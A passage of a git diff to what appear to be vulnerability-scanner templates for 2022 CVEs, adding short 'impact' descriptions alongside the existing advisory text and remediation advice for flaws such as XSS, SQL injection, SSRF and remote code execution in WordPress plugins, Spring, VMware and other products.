a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index bc83c444d0..8f158b6f12 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to Microweber CMS version 1.2.15 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml index 2083cd5643..4de6af78dc 100644 --- a/http/cves/2022/CVE-2022-1442.yaml +++ b/http/cves/2022/CVE-2022-1442.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Metform plugin through 2.1.3 is susceptible to information disclosure due to improper access control in the ~/core/forms/action.php file. An attacker can view all API keys and secrets of integrated third-party APIs such as that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Upgrade to the latest version of the Metform plugin (>=2.1.4) to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index a43451a65f..62a93c562e 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server. + impact: | + An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access. remediation: | Update to the latest version of the plugin or remove it if not needed. reference: diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index 4c36fb577a..7083fac409 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade WordPress WPQA to version 5.4 or later, which includes proper input sanitization to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml index 74b9c4a67b..3b37020e18 100644 --- a/http/cves/2022/CVE-2022-1598.yaml +++ b/http/cves/2022/CVE-2022-1598.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site. + impact: | + This vulnerability can result in unauthorized access to sensitive information, potentially leading to data breaches or unauthorized actions. remediation: | Update the WPQA plugin to version 5.5 or later to fix the improper access control issue. reference: diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml index 3a9ad551ce..fee93d9e6c 100644 --- a/http/cves/2022/CVE-2022-1609.yaml +++ b/http/cves/2022/CVE-2022-1609.yaml @@ -5,6 +5,8 @@ info: author: For3stCo1d severity: critical description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade The School Management to version 9.9.7 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index a8e0c7fafa..76fbcbfcd9 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage. remediation: | Upgrade Drawio to version 18.0.4 or later to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index d3afaecb08..c0e1667403 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress Simple Membership plugin (4.1.1 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index 74faa9bf0c..2af1e896af 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: Fixed in version 7.4.5 reference: - https://wpscan.com/vulnerability/6ad407fe-db2b-41fb-834b-dd8c4f62b072 diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index 90b7b34835..83d50300ee 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Update to the latest version of the RSVPMaker plugin (9.3.3 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index a57d06af93..d38265ece4 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services. remediation: | Upgrade Drawio to version 18.1.2 or later to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index b4d3bfca51..9784d6d3e2 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Terraboard to version 2.2.0 or later to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml index 35cedcdb7e..b0e3ad959e 100644 --- a/http/cves/2022/CVE-2022-1903.yaml +++ b/http/cves/2022/CVE-2022-1903.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username. + impact: | + An attacker can gain unauthorized access to the admin account, potentially leading to further compromise of the system. remediation: Fixed in version 3.4.8 reference: - https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08 diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml index b687e89862..6ae4668646 100644 --- a/http/cves/2022/CVE-2022-1904.yaml +++ b/http/cves/2022/CVE-2022-1904.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. remediation: | Update to the latest version of WordPress Easy Pricing Tables plugin (3.2.1) to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index a4e754dfac..c09c9399a1 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress Copyright Proof plugin (>=4.17) which includes proper input sanitization and validation. reference: diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 672da1aead..2d40df8a8d 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Shortcodes and extra features plugin for the Phlox theme before 2.9.8 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Shortcodes and Extra Features for Phlox plugin (2.9.8 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml index d24d3ae0b7..98a89eb0ff 100644 --- a/http/cves/2022/CVE-2022-1916.yaml +++ b/http/cves/2022/CVE-2022-1916.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to version 1.0.5 or later of the WordPress Active Products Tables for WooCommerce plugin to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml index d8ff658180..efcf5ad171 100644 --- a/http/cves/2022/CVE-2022-1933.yaml +++ b/http/cves/2022/CVE-2022-1933.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade WordPress to version 5.1.9 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml index 2d61c9ade9..91f606aa40 100644 --- a/http/cves/2022/CVE-2022-1937.yaml +++ b/http/cves/2022/CVE-2022-1937.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Awin Data Feed plugin 1.6 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action, available to both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Awin Data Feed plugin (1.6 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index 175bc08c6b..06ce7798c3 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress Gallery plugin before 2.0.0 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, available to both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Gallery plugin to version 2.0.0 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index 38b9311924..a3a04b98be 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in remote code execution, allowing an attacker to take complete control of the affected WordPress site. remediation: | Update to the latest version of the WordPress eaSYNC Booking plugin (1.1.16) or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index cf97ee1853..0e167d6fd3 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -5,6 +5,8 @@ info: author: paradessia,narluin severity: high description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data. + impact: | + An attacker can read sensitive files containing credentials, configuration details, or other sensitive information. remediation: | Apply the latest security patches provided by Oracle to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 5de3aa4d3a..ec40db3ae6 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Oracle E-Business Suite application. remediation: | Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index 45a84021e3..b274bde076 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress before 5.8.3 is susceptible to SQL injection through multiple plugins or themes due to improper sanitization in WP_Query, An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: This has been patched in 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability. reference: - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317 diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index 048c69ae56..1f22a361db 100644 --- a/http/cves/2022/CVE-2022-21705.yaml +++ b/http/cves/2022/CVE-2022-21705.yaml @@ -6,6 +6,8 @@ info: severity: high description: | October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. reference: diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index db5670c3c9..3047386430 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -5,6 +5,8 @@ info: author: GitLab Red Team severity: high description: GitLab CE/EE 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 is susceptible to remote code execution. An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by GitLab to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml index 4e916d3801..00ae631428 100644 --- a/http/cves/2022/CVE-2022-2187.yaml +++ b/http/cves/2022/CVE-2022-2187.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update the WordPress Contact Form 7 Captcha plugin to version 0.1.2 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index 8e57244cbe..94316e0ff9 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected website. remediation: Fixed in version 2.7.27 reference: - https://wpscan.com/vulnerability/1240797c-7f45-4c36-83f0-501c544ce76a diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 17579eeb58..9fdc083ba0 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index 53a4145fb1..47717fd6ff 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive data and potential data leakage. remediation: | Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index a9015b5aaf..1e9bcfd5a3 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access and control of the ElasticJob-UI application. remediation: | Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index d2212c7c05..ec7688cb07 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index f29466e7d7..77826c261a 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -5,6 +5,8 @@ info: author: dbrwsky severity: medium description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Trilium instance. remediation: | Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index cbb5a88115..be109ca149 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patches provided by the vendor and ensure proper input validation to prevent code injection attacks. reference: diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index c4e8f54676..9e34745ef6 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml index 1d438a0a73..56b0989602 100644 --- a/http/cves/2022/CVE-2022-22963.yaml +++ b/http/cves/2022/CVE-2022-22963.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml index f3774b4f4c..06b0f81ea4 100644 --- a/http/cves/2022/CVE-2022-22965.yaml +++ b/http/cves/2022/CVE-2022-22965.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit. reference: - https://tanzu.vmware.com/security/cve-2022-22965 diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index cfa3852e40..e34c8b51da 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972). reference: diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 4692313914..98acdc07e4 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. remediation: | Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index eaf7c2822e..96692e0ebd 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -5,6 +5,8 @@ info: author: For3stCo1d,spac3wh1te severity: critical description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix monitoring system. remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher. reference: - https://support.zabbix.com/browse/ZBX-20350 diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index 402f8807cb..a187519943 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -5,6 +5,8 @@ info: author: bananabr severity: medium description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration. remediation: | Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml index 296bcc3d26..e67e3c6492 100644 --- 